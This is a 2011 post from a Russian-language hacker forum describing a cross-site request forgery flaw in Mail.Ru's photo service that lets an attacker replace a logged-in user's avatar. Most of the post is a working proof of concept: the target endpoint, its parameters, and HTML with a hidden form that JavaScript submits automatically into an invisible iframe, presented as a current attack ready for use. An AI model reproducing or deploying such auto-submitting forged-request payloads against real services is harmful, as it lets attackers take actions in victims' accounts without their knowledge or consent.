Stas'M Corp.
Главная | XSRF изменение аватарки (актуально) - Форум | Регистрация | Вход
 
Среда, 31.05.2023, 23:04
Приветствую Вас Гость | RSS
| ENG | RUS
Форма входа

Информация о тебе:

IP-адрес: 18.207.240.77
Браузер: Неизвестен
Основные разделы
Мини-чат
Загружаем...
Пожалуйста подождите.
Наш опрос
На данный момент в разработке несколько проектов. Какие бы вы хотели увидеть в первую очередь?
Всего ответов: 563
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Administrator, Phantom, b@bskEnízm  
Форум » Хакерский форум » Mail.Ru » XSRF изменение аватарки (актуально)
XSRF изменение аватарки (актуально)
AdministratorДата: Понедельник, 30.05.2011, 18:11 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 90
Награды: 39
Репутация: 50
Статус: Offline
XSRF уязвимость позволяет атакующему изменить основное фото (аватару) пользователя.
Создаётся специальный HTML файл с формой и с использованием JavaScript.

Образец запроса:

URL:http://foto.mail.ru/cgi-bin/photo/addphoto
Метод:POST
Кодировка:Windows-1251
Поля запроса:
myphoto1
kavt1
add1
upload_byURL
Поля формы:
upl-swurl
URLСсылка на изображение

Образец HTML кода, использующего эту уязвимость:

Code
<form id="avatarko" method="POST" target="ava_to" action="http://foto.mail.ru/cgi-bin/photo/addphoto?myphoto=1&kavt=1&add=1&upload_by=URL">
<input type="hidden" name="upl-sw" value="url">
<input type="hidden" name="URL" value="http://realfijinews.files.wordpress.com/2009/09/obamaspeaking.jpg">
<input type="submit" value="Submit">
</form>
<iframe name="ava_to" width="0" height="0" scrolling="no" frameborder="0"></iframe>
<script type="text/javascript">
document.getElementById('avatarko').submit();
</script>
 
Форум » Хакерский форум » Mail.Ru » XSRF изменение аватарки (актуально)
  • Страница 1 из 1
  • 1
Поиск:

Веб приложения
Пожертвование / Donate
WMWebMoney transferZ358077191062
WMWebMoney transferE208225402366
WMWebMoney transferB345247247920
Друзья сайта

Просим вас посещать сайты наших друзей! Они достойны такого же внимания как и мы!

Пользователи

Пользователи онлайн:
Статистика

Copyright © Stas'M Corp. 2023Хостинг от uCoz